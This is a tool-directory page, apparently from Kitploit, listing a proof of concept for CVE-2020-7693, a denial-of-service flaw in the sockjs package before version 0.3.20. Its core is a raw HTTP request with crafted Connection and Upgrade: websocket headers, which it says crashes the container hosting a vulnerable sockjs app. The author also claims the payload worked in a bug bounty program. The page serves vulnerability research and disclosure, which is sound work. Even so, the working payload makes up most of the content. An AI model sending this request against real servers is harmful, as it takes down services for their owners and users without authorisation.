Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-7693 — POC For CVE-2020-7693 (Testing on Version sockjs@0.3.18) | Kitploit
Tools/GitHubGitHub/thewindghost/cve-2020-7693
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthewindghost/cve-2020-7693

CVE-2020-7693

POC For CVE-2020-7693 (Testing on Version [email protected])

View Repository
7 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-7693 Poc

Note: I Confirm Payload for CVE-2020-7693 can running in Bug Bounty Program

Description:

  • Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.

Single Request Crashes Server via Outdated sockjs-node:

  • Request
root@kitploit:~
GET /sockjs-node/000/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: Upgrade
Upgrade: websocket
Cache-Control: no-cache
Connection: close
\r\n (delete-this)
\r\n (delete-this)

  • Repones
image

In Server:

image image
Download Tool